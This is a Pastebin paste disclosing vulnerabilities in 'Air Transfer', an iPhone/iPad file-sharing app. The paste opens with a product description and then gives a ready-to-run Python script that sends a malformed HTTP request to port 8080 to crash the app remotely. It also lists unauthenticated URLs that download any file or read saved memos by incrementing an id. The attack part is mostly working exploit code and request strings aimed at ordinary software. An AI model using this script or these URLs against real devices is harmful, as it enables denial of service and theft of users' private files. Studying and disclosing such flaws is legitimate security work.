SHARE
TWEET

airTransfer_Crash-iDevice

a guest Aug 26th, 2014 696 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. --------------------------------------------------------
  2.  
  3. Product & Service Details:
  4. ==========================
  5. Air Transfer - Easy file sharing between PC and iPhone/iPad, File Manager with Document Viewer, Video Player, Music Player and Web Browser.
  6.  
  7. Features include:
  8. -----------------
  9.  
  10. * The easiest way to transfer files between PC and iPhone/iPad !
  11. * Just Drag & Drop your contents and Play: Text, Bookmark, Image and Photo, Music, Movie, Documents and more through wireless connection !
  12.  
  13.  
  14.  
  15. Vulnerability details
  16. =========================
  17. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  18. 1. Remote Application Crashing
  19. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  20.  
  21. #!/usr/bin/python
  22. import socket
  23. import sys
  24. s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
  25. host=raw_input("Enter IP : ")
  26. port=8080
  27. def connect():
  28.     try:
  29.         s.connect((str(host),port))
  30.     except socket.error:
  31.         print "Error: couldn't connect"
  32.         sys.exit()
  33.     return "connected to target"
  34. #Crashing the App
  35. def crashing():
  36.     req="GET /getList?category=categoryAll?pageNo=1&key= HTTP/1.1\r\n\r\n"
  37.     try:
  38.         s.sendall(req)
  39.     except:
  40.         print "Error occured, Couldn't crash App"
  41.         sys.exit()
  42.     return "Application Down, Conection closed"  
  43. print connect()
  44. print crashing()
  45. ______________________________________________________________________________________________________________________________
  46.  
  47. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  48. 2. Broken Authentication - Memo access & File download.
  49. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  50.  
  51. To download any file simply visit:
  52.  
  53. http://<IP>:8080/?downloadSingle?id=1
  54.  
  55. Just by incrementing the value of "id" we can download all the files.  
  56.  
  57. TO view saved memos visit the below link:
  58.  
  59. http://<IP>:8080/getText?id=0
  60.  
  61.  
  62. We can look for all the memos by incrementing the value of "id"
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top